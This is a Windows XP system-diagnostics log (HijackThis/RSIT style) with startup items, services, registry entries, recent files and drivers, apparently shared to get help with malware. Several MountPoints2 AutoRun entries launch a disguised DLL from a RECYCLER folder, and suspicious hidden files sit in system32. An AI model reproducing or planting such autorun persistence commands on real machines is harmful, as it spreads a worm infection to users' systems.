O4 - Global Startup: InterVideo WinCinema Manager.lnk = C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe
O8 - Extra context menu item: Az összes letöltése Free Download Managerrel - file://C:\Program Files\Free Download Manager\dlall.htm
O8 - Extra context menu item: Kijelölés letöltése Free Download Managerrel - file://C:\Program Files\Free Download Manager\dlselected.htm
O8 - Extra context menu item: Letöltés Free Download Managerrel - file://C:\Program Files\Free Download Manager\dllink.htm
O8 - Extra context menu item: Video letöltése a Free Download Manager-rel - file://C:\Program Files\Free Download Manager\dlfvideo.htm
O9 - Extra button: ACA Capture Pro indítása - {905A31AA-BDD1-44bd-9920-53D34E5953A4} - C:\Program Files\ACASystems\ACACapturePro\SCapPro.exe
O9 - Extra button: Kutatás - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {9543741D-4E79-4f0d-8E60-A702CDF8B2D2} - C:\Program Files\ACASystems\ACACapturePro\SCapPro.exe
O9 - Extra 'Tools' menuitem: ACA Capture Pro indítása - {9543741D-4E79-4f0d-8E60-A702CDF8B2D2} - C:\Program Files\ACASystems\ACACapturePro\SCapPro.exe
O9 - Extra button: BitComet - {D18A0B52-D63C-4ed0-AFC6-C1E3DC1AF43A} - res://C:\Program Files\BitComet\tools\BitCometBHO_1.2.2.28.dll/206 (file missing)
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\WINDOWS\system32\shdocvw.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\WINDOWS\system32\shdocvw.dll
O9 - Extra button: @C:\Program Files\Messenger\Msgslang.dll,-61144 - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: @C:\Program Files\Messenger\Msgslang.dll,-61144 - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/s ... wflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{32FFFEDD-3CF7-4BA8-94B2-A780D023C5C4}: NameServer = 84.2.46.1 84.2.44.1
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O23 - Service: Acronis Scheduler2 Service (AcrSch2Svc) - Acronis - C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATK Keyboard Service (ATKKeyboardService) - ASUSTeK COMPUTER INC. - C:\WINDOWS\ATKKBService.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: cFosSpeed System Service (cFosSpeedS) - cFos Software GmbH - C:\Program Files\cFosSpeed\spd.exe
O23 - Service: Comodo Application Agent (CmdAgent) - COMODO - C:\Program Files\Comodo\Firewall\cmdagent.exe
O23 - Service: Diskeeper - Diskeeper Corporation - C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Remote HID Service (LvHidSvc) - Philips - C:\WINDOWS\system32\lvhidsvc.exe
O23 - Service: lxcc_device - Lexmark International, Inc. - C:\WINDOWS\system32\lxcccoms.exe
O23 - Service: NetLimiter (nlsvc) - Locktime Software - C:\Program Files\NetLimiter 2 Pro\nlsvc.exe
O23 - Service: NMSAccessU - Unknown owner - C:\Program Files\CDBurnerXP\NMSAccessU.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: PC Tools Auxiliary Service (sdAuxService) - PC Tools - C:\Program Files\Spyware Doctor\pctsAuxs.exe
O23 - Service: PC Tools Security Service (sdCoreService) - PC Tools - C:\Program Files\Spyware Doctor\pctsSvc.exe
O23 - Service: Acronis Try And Decide Service (TryAndDecideService) - Unknown owner - C:\Program Files\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
O23 - Service: Virtual CD v5 Security service (VC5SecS) - H+H Software GmbH - C:\Program Files\HHVcdV5Sys\VC5SecS.exe

--
End of file - 12376 bytes

======Scheduled tasks folder======

C:\WINDOWS\tasks\AppleSoftwareUpdate.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00C6482D-C502-44C8-8409-FCE54AD9C208}]
SnagIt Toolbar Loader - C:\Program Files\TechSmith\Snagit 9\SnagitBHO.dll [2008-11-06 68936]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}]
Adobe PDF Reader hivatkozássúgó - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2006-10-23 62080]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{39F7E362-828A-4B5A-BCAF-5B79BFDFEA60}]
BitComet Helper - C:\Program Files\BitComet\tools\BitCometBHO_1.2.2.28.dll [2008-02-29 468280]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre6\bin\ssv.dll [2009-01-14 320920]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{93C69D87-A11D-4FFC-BC56-BE7EE0D235BA}]
CACABHO Object - C:\Program Files\ACASystems\ACACapturePro\scap003p.dll [2006-02-24 102400]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2009-01-14 34816]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2009-01-14 73728]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - Snagit - C:\Program Files\TechSmith\Snagit 9\SnagitIEAddin.dll [2008-11-06 211272]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RecSche"=C:\Program Files\TVR\RecSche.exe [2004-05-10 454656]
"ChrisTV Agent"=C:\Program Files\ChrisTV\ChrisTV_Agent.exe [2005-05-02 187392]
"PinnacleDriverCheck"=C:\WINDOWS\system32\\PSDrvCheck.exe [2004-03-11 406016]
"amd_dc_opt"=C:\Program Files\AMD\Dual-Core Optimizer\amd_dc_opt.exe [2007-07-23 77824]
"lxccmon.exe"=C:\Program Files\Lexmark 3300 Series\lxccmon.exe [2005-07-21 192512]
"FaxCenterServer"=C:\Program Files\Lexmark Fax Solutions\fm3032.exe [2005-07-12 299008]
"cFosSpeed"=C:\Program Files\cFosSpeed\cFosSpeed.exe [2007-10-17 854992]
"avast!"=C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe [2009-02-05 81000]
"VC5Player"=C:\Program Files\HHVcdV5Sys\VC5Play.exe [2003-11-07 176128]
"UnlockerAssistant"=C:\Program Files\Unlocker\UnlockerAssistant.exe [2006-05-06 6656]
"CClipboard"=C:\Program Files\ComfortClipboard\CClipboard.exe [2008-06-07 2843136]
"SunJavaUpdateSched"=C:\Program Files\Java\jre6\bin\jusched.exe [2009-01-14 136600]
"CloneCDTray"=C:\Program Files\SlySoft\CloneCD\CloneCDTray.exe [2006-09-28 57344]
"KernelFaultCheck"=C:\WINDOWS\system32\dumprep 0 -k []
"SkyTel"=C:\WINDOWS\SkyTel.EXE [2006-05-20 2879488]
"QuickTime Task"=C:\Program Files\QuickTime\QTTask.exe [2008-09-06 413696]
"RTHDCPL"=C:\WINDOWS\RTHDCPL.EXE [2007-02-03 16116224]
"Alcmtr"=C:\WINDOWS\ALCMTR.EXE [2005-05-07 69632]
"ASUSGamerOSD"=C:\Program Files\ASUS\GamerOSD\GamerOSD.exe [2007-10-23 380928]
"StartCCC"=C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [2009-03-17 61440]
"LXCCCATS"=rundll32 C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\LXCCtime.dll,_RunDLLEntry@16 []
"UserFaultCheck"=C:\WINDOWS\system32\dumprep 0 -u []
"COMODO Firewall Pro"=C:\Program Files\Comodo\Firewall\CPF.exe [2009-06-18 1115728]
"ISTray"=C:\Program Files\Spyware Doctor\pctsTray.exe [2008-12-08 1173384]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"=C:\WINDOWS\system32\ctfmon.exe [2004-08-18 15360]
"MSMSGS"=C:\Program Files\Messenger\Msmsgs.exe [2008-06-02 1660952]
"DAEMON Tools"=C:\Program Files\DAEMON Tools\daemon.exe [2007-04-04 165784]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SkyTel]
C:\WINDOWS\SkyTel.EXE [2006-05-20 2879488]

C:\Documents and Settings\All Users\Start Menu\Programs\Indítópult
HP Digital Imaging Monitor.lnk - C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
hpoddt01.exe.lnk - C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
InterVideo WinCinema Manager.lnk - C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\!SASWinLogon]
C:\Program Files\SUPERAntiSpyware\SASWINLO.dll [2008-12-22 356352]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtiExtEvent]
C:\WINDOWS\system32\Ati2evxx.dll [2009-03-16 155648]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"=C:\Program Files\SUPERAntiSpyware\SASSEH.DLL [2008-05-13 77824]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"authentication packages"=msv1_0
relog_ap
"notification packages"=
scecli

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sdauxservice]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sdcoreservice]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\sdauxservice]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\sdcoreservice]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
""=014

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=36
"NoDrives"=0
"NoDriveAutoRun"=FFFFFFFF

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDrives"=
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\concept design\onlineTV 3\onlineTV.exe"="C:\Program Files\concept design\onlineTV 3\onlineTV.exe:*:Enabled:onlineTV"
"C:\Program Files\Pinnacle\Studio 10\programs\RM.exe"="C:\Program Files\Pinnacle\Studio 10\programs\RM.exe:*:Enabled:Render Manager"
"C:\Program Files\Pinnacle\Studio 10\programs\Studio.exe"="C:\Program Files\Pinnacle\Studio 10\programs\Studio.exe:*:Enabled:Studio"
"C:\Program Files\Pinnacle\Studio 10\programs\PMSRegisterFile.exe"="C:\Program Files\Pinnacle\Studio 10\programs\PMSRegisterFile.exe:*:Enabled:PMSRegisterFile"
"C:\Program Files\Pinnacle\Studio 10\programs\umi.exe"="C:\Program Files\Pinnacle\Studio 10\programs\umi.exe:*:Enabled:umi"
"C:\Program Files\uTorrent\uTorrent.exe"="C:\Program Files\uTorrent\uTorrent.exe:*:Enabled:µTorrent"
"C:\Program Files\eMule\emule.exe"="C:\Program Files\eMule\emule.exe:*:Enabled:eMule"
"C:\WINDOWS\system32\lxcccoms.exe"="C:\WINDOWS\system32\lxcccoms.exe:*:Enabled:3300 Series Server"
"C:\WINDOWS\system32\spool\drivers\w32x86\3\lxccpswx.exe"="C:\WINDOWS\system32\spool\drivers\w32x86\3\lxccpswx.exe:*:Enabled:3300 Series Printer Status"
"C:\Program Files\VoipCheapCom\VoipCheapCom.exe"="C:\Program Files\VoipCheapCom\VoipCheapCom.exe:*:Enabled:VoipCheapCom"
"C:\Program Files\Messenger\Msmsgs.exe"="C:\Program Files\Messenger\Msmsgs.exe:*:Enabled:Windows Messenger"
"C:\Downloads\utorrent.exe"="C:\Downloads\utorrent.exe:*:Enabled:µTorrent"
"C:\Program Files\Java\jre6\bin\javaw.exe"="C:\Program Files\Java\jre6\bin\javaw.exe:*:Enabled:Java(TM) Platform SE binary"
"C:\Program Files\Java\jre6\bin\java.exe"="C:\Program Files\Java\jre6\bin\java.exe:*:Enabled:Java(TM) Platform SE binary"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\concept design\onlineTV 3\onlineTV.exe"="C:\Program Files\concept design\onlineTV 3\onlineTV.exe:*:Enabled:onlineTV"
"C:\Program Files\MSN Messenger\msnmsgr.exe"="C:\Program Files\MSN Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger 8.1"
"C:\Program Files\MSN Messenger\livecall.exe"="C:\Program Files\MSN Messenger\livecall.exe:*:Enabled:Windows Live Messenger 8.1 (Phone)"

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{0091bc3c-db4c-11dd-8c0a-001d60523543}]
shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RUNdLl32.ExE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{0091bc3d-db4c-11dd-8c0a-001d60523543}]
shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RUNdLl32.ExE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{882072bb-dc20-11dd-8c0b-001d60523543}]
shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RUNdLl32.ExE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{882072bc-dc20-11dd-8c0b-001d60523543}]
shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RUNdLl32.ExE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn


======List of files/folders created in the last 1 months======

2009-06-19 11:53:00 ----D---- C:\rsit
2009-06-19 10:29:34 ----D---- C:\Documents and Settings\PALI\Application Data\Convivea
2009-06-19 10:29:33 ----D---- C:\Program Files\Bit Che
2009-06-18 08:02:37 ----D---- C:\Program Files\Common Files\PC Tools
2009-06-18 08:02:29 ----D---- C:\Documents and Settings\All Users\Application Data\PC Tools
2009-06-14 12:09:55 ----D---- C:\Program Files\xyr0x Security
2009-06-14 11:37:37 ----AH---- C:\WINDOWS\system32\shell.exe
2009-06-14 11:37:37 ----A---- C:\WINDOWS\system32\rapid.dll
2009-06-14 11:37:25 ----AH---- C:\WINDOWS\system32\run.bat
2009-06-14 11:37:25 ----A---- C:\WINDOWS\system32\Rapid.exe
2009-06-12 17:29:05 ----D---- C:\Program Files\Driver Cleaner Pro
2009-06-10 22:37:30 ----D---- C:\Documents and Settings\PALI\Application Data\Ashampoo
2009-06-10 21:25:14 ----D---- C:\Documents and Settings\All Users\Application Data\ATI
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\atioglxx.dll
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\atimpc32.dll
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\aticalrt.dll
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\aticaldd.dll
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\aticalcl.dll
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\atibtmon.exe
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\atiadlxx.dll
2009-06-10 20:24:06 ----A---- C:\WINDOWS\ATKKBService.exe
2009-06-10 20:24:04 ----A---- C:\WINDOWS\system32\ATKOSDMini.DLL
2009-06-10 20:24:04 ----A---- C:\WINDOWS\system32\atkid.ini
2009-06-10 20:24:04 ----A---- C:\WINDOWS\system32\ATKDispCPL.dll
2009-06-10 20:24:04 ----A---- C:\WINDOWS\system32\ATKDISP.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\xvidvfw.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\xvidcore.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\DPInst.exe
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\devcon.exe
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\ATKOSDX32.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\ATKOGL32.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\asrussian.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\askorean.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\asjapan.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\asgerman.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\asfrench.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\aseng.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\ASCHT.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\aschs.dll
2009-06-10 20:12:50 ----R---- C:\WINDOWS\Alcmtr.exe
2009-06-08 22:31:54 ----D---- C:\Program Files\The FilmMachine
2009-06-08 22:19:42 ----R---- C:\WINDOWS\system32\ChCfg.exe
2009-06-08 22:19:20 ----R---- C:\WINDOWS\SoundMan.exe
2009-06-08 22:19:19 ----R---- C:\WINDOWS\SkyTel.exe
2009-06-08 22:19:18 ----R---- C:\WINDOWS\RtlUpd.exe
2009-06-08 22:19:16 ----R---- C:\WINDOWS\RTLCPL.exe
2009-06-08 22:19:10 ----R---- C:\WINDOWS\RTHDCPL.exe
2009-06-08 22:19:09 ----R---- C:\WINDOWS\MicCal.exe
2009-06-08 22:19:06 ----R---- C:\WINDOWS\alcwzrd.exe
2009-06-08 22:19:05 ----D---- C:\Program Files\Realtek
2009-06-08 22:19:00 ----R---- C:\WINDOWS\RtlExUpd.dll
2009-06-05 23:50:34 ----D---- C:\Documents and Settings\PALI\Application Data\ATI
2009-06-05 23:33:17 ----D---- C:\Program Files\My Company Name
2009-06-05 23:27:00 ----D---- C:\Program Files\Common Files\ATI Technologies
2009-06-05 23:22:44 ----A---- C:\WINDOWS\system32\atiiiexx.dll
2009-06-05 23:22:29 ----A---- C:\WINDOWS\system32\ATIDEMGX.dll
2009-06-05 11:54:14 ----D---- C:\Program Files\ATI Technologies
2009-06-01 16:08:01 ----D---- C:\Program Files\FDRLab
2009-05-29 10:03:56 ----D---- C:\WINDOWS\system32\3Planesoft
2009-05-29 10:03:56 ----D---- C:\Program Files\3Planesoft Screensaver Manager
2009-05-29 10:03:48 ----D---- C:\Program Files\Tropical Fish 3D Screensaver

======List of files/folders modified in the last 1 months======

2009-06-19 11:53:03 ----D---- C:\Program Files\HijackThis
2009-06-19 11:53:01 ----D---- C:\WINDOWS\Prefetch
2009-06-19 11:52:51 ----D---- C:\Documents and Settings\PALI\Application Data\uTorrent
2009-06-19 11:45:43 ----D---- C:\Program Files\cFosSpeed
2009-06-19 11:03:48 ----D---- C:\WINDOWS\system32
2009-06-19 10:52:10 ----D---- C:\Downloads
2009-06-19 10:29:33 ----D---- C:\Program Files
2009-06-19 08:42:11 ----D---- C:\Program Files\Mozilla Firefox
2009-06-19 08:26:33 ----D---- C:\WINDOWS\temp
2009-06-19 08:24:51 ----AD---- C:\Documents and Settings\All Users\Application Data\TEMP
2009-06-19 08:19:51 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2009-06-19 08:19:37 ----A---- C:\WINDOWS\wincmd.ini
2009-06-19 08:15:57 ----D---- C:\WINDOWS\system32\drivers
2009-06-18 19:34:38 ----D---- C:\Program Files\Spyware Doctor
2009-06-18 12:23:31 ----D---- C:\Program Files\FairUse Wizard 2
2009-06-18 12:23:30 ----D---- C:\WINDOWS
2009-06-18 12:23:30 ----D---- C:\32788R22FWJFW
2009-06-18 08:53:59 ----D---- C:\Program Files\Common Files\Elecard
2009-06-18 08:02:37 ----D---- C:\Program Files\Common Files
2009-06-17 19:38:36 ----A---- C:\WINDOWS\SchedLgU.Txt
2009-06-17 19:37:06 ----RSH---- C:\boot.ini
2009-06-17 19:36:48 ----D---- C:\Program Files\Comodo
2009-06-17 11:30:26 ----A---- C:\WINDOWS\NeroDigital.ini
2009-06-16 12:25:16 ----D---- C:\WINDOWS\system32\CatRoot2
2009-06-16 09:58:46 ----D---- C:\Documents and Settings\PALI\Application Data\Vso
2009-06-15 11:12:21 ----A---- C:\WINDOWS\GIB30_32.INI
2009-06-14 22:55:47 ----A---- C:\WINDOWS\v2d.INI
2009-06-14 22:54:39 ----A---- C:\Documents and Settings\PALI\Application Data\FixVTS.ini
2009-06-14 22:52:11 ----D---- C:\Program Files\Avidemux 2.4
2009-06-13 23:40:52 ----SHD---- C:\WINDOWS\Installer
2009-06-13 23:40:52 ----HD---- C:\Config.Msi
2009-06-13 23:40:50 ----A---- C:\WINDOWS\ODBCINST.INI
2009-06-13 23:39:36 ----A---- C:\WINDOWS\ODBC.INI
2009-06-13 23:38:30 ----N---- C:\WINDOWS\Setup1.exe
2009-06-13 23:37:36 ----A---- C:\WINDOWS\ST6UNST.EXE
2009-06-13 22:27:47 ----D---- C:\Program Files\MooGUI
2009-06-13 19:10:31 ----D---- C:\Program Files\Lx_cats
2009-06-13 18:38:08 ----HD---- C:\WINDOWS\inf
2009-06-13 18:23:47 ----D---- C:\Temp
2009-06-13 10:51:27 ----A---- C:\WINDOWS\cFosSpeed_Setup_Log.txt
2009-06-13 09:38:17 ----D---- C:\WINDOWS\Debug
2009-06-10 22:37:05 ----D---- C:\Program Files\Ashampoo
2009-06-10 21:20:30 ----RSD---- C:\WINDOWS\assembly
2009-06-10 21:20:23 ----D---- C:\WINDOWS\WinSxS
2009-06-10 21:14:59 ----RSHDC---- C:\WINDOWS\system32\dllcache
2009-06-10 21:14:52 ----D---- C:\WINDOWS\system32\ReinstallBackups
2009-06-10 21:14:28 ----D---- C:\WINDOWS\system32\CatRoot
2009-06-10 20:24:06 ----D---- C:\WINDOWS\Help
2009-06-10 20:24:04 ----D---- C:\Program Files\ASUS
2009-06-10 20:24:03 ----HD---- C:\Program Files\InstallShield Installation Information
2009-06-10 20:14:24 ----A---- C:\WINDOWS\Ascd_log.ini
2009-06-10 20:13:42 ----D---- C:\WINDOWS\system32\RTCOM
2009-06-10 20:08:02 ----A---- C:\WINDOWS\AS_Debug.txt
2009-06-10 19:49:28 ----A---- C:\boot.ini.comodofirewall
2009-06-10 19:48:46 ----A---- C:\WINDOWS\Ascd_tmp.ini
2009-06-09 18:55:43 ----D---- C:\Program Files\XRECODE
2009-06-09 16:00:00 ----D---- C:\Program Files\ChrisTV
2009-06-08 22:39:30 ----D---- C:\Program Files\AviSynth 2.5
2009-06-08 22:11:56 ----D---- C:\Program Files\MoBiMouse
2009-06-08 22:07:23 ----D---- C:\Documents and Settings\PALI\Application Data\InstallShield
2009-06-08 22:07:23 ----D---- C:\Documents and Settings\All Users\Application Data\InstallShield
2009-06-08 21:54:00 ----A---- C:\WINDOWS\IE4 Error Log.txt
2009-06-08 21:34:53 ----D---- C:\Program Files\Real Alternative
2009-06-08 18:23:47 ----D---- C:\WINDOWS\system32\config
2009-06-06 22:45:43 ----D---- C:\Documents and Settings\PALI\Application Data\Free Download Manager
2009-06-06 22:45:02 ----AD---- C:\Program Files\USDownloader - Cap
2009-06-06 15:44:32 ----D---- C:\Documents and Settings\PALI\Application Data\Simple Sudoku
2009-06-06 15:40:57 ----D---- C:\Program Files\RapidSolution
2009-06-06 15:26:39 ----D---- C:\Program Files\Daniusoft
2009-06-05 00:40:27 ----A---- C:\WINDOWS\DUMP691a.tmp
2009-06-02 04:23:08 ----D---- C:\WINDOWS\Minidump

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 Aavmker4;avast! Asynchronous Virus Monitor; C:\WINDOWS\system32\drivers\Aavmker4.sys [2009-02-05 26944]
R1 AFS2K;AFS2k; C:\WINDOWS\system32\drivers\AFS2K.sys [2008-03-04 82380]
R1 AmdK8;AMD processzor-illesztőprogram; C:\WINDOWS\system32\DRIVERS\AmdK8.sys [2006-06-19 43520]
R1 AsIO;AsIO; C:\WINDOWS\system32\drivers\AsIO.sys [2006-10-18 12664]
R1 asuskbnt;Enhanced Display Driver Helper Service; C:\WINDOWS\system32\drivers\atkkbnt.sys [2007-10-23 11136]
R1 aswSP;avast! Self Protection; C:\WINDOWS\system32\drivers\aswSP.sys [2009-02-05 114768]
R1 aswTdi;avast! Network Shield Support; C:\WINDOWS\system32\drivers\aswTdi.sys [2009-02-05 51376]
R1 CmdMon;Comodo Application Engine; C:\WINDOWS\System32\DRIVERS\cmdmon.sys [2009-06-18 75520]
R1 ElbyCDIO;ElbyCDIO Driver; C:\WINDOWS\System32\Drivers\ElbyCDIO.sys [2007-08-07 25160]
R1 nltdi;nltdi; \??\C:\WINDOWS\system32\drivers\nltdi.sys []
R1 PCLEPCI;PCLEPCI; \??\C:\WINDOWS\system32\drivers\pclepci.sys []
R1 PQNTDrv;PQNTDrv; C:\WINDOWS\system32\drivers\PQNTDrv.sys [2002-09-16 4228]
R1 SASDIFSV;SASDIFSV; \??\C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS []
R1 SASKUTIL;SASKUTIL; \??\C:\Program Files\SUPERAntiSpyware\SASKUTIL.sys []
R1 USIUDF;USIUDF; C:\WINDOWS\System32\Drivers\USIUDF.sys [2004-07-07 292896]
R2 Aspi32;Aspi32; C:\WINDOWS\System32\drivers\aspi32.sys [2002-07-17 16877]
R2 aswFsBlk;aswFsBlk; C:\WINDOWS\system32\DRIVERS\aswFsBlk.sys [2009-02-05 20560]
R2 aswMon2;avast! Standard Shield Support; C:\WINDOWS\system32\drivers\aswMon2.sys [2009-02-05 94032]
